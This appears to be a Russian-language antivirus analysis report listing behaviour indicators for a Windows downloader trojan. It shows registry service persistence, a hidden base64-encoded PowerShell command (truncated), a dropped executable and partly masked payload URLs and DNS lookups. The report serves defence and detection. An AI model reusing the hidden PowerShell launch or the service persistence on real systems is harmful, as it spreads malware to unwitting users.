Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\shadesraw] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\shadesraw] 'ImagePath' = '"%WINDIR%\SysWOW64\shadesraw.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABIAHYAdQB6AG4AYQBiAHQAYQBtAGsAPQAnAEYAcQBzAGIAbgBvAGEAYQAnADsAJABVAGEAdgBtAHAAaAB6AHMAdQAgAD0AIAAnADkANwA1ACcAOwAkAFAAcAB3AHUAcABmAHEAbwBzAD0AJwBPAG8AbQBhAGoAdABuAGUAJwA7ACQARgB...
- %HOMEPATH%\975.exe
- %HOMEPATH%\975.exe
- %HOMEPATH%\975.exe в %WINDIR%\syswow64\shadesraw.exe
- %HOMEPATH%\975.exe
- http://fl##z.xyz/wp-admin/IhpywXJaZ/
- http://fl##z.xyz/cgi-sys/suspendedpage.cgi
- http://am###homes.ca/scss/eGHgoiqi/
- http://bo####g.arai.agency/core/mzVfRWm/
- http://98.##2.74.164/mCVUUxx
- DNS ASK fl##z.xyz
- DNS ASK am###homes.ca
- DNS ASK bo####g.arai.agency
- DNS ASK vl#e.kr
- DNS ASK to#######los.000webhostapp.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABIAHYAdQB6AG4AYQBiAHQAYQBtAGsAPQAnAEYAcQBzAGIAbgBvAGEAYQAnADsAJABVAGEAdgBtAHAAaAB6AHMAdQAgAD0AIAAnADkANwA1ACcAOwAkAFAAcAB3AHUAcABmAHEAbwBzAD0AJwBPAG8AbQBhAGoAdABuAGUAJwA7ACQARgB...' (со скрытым окном)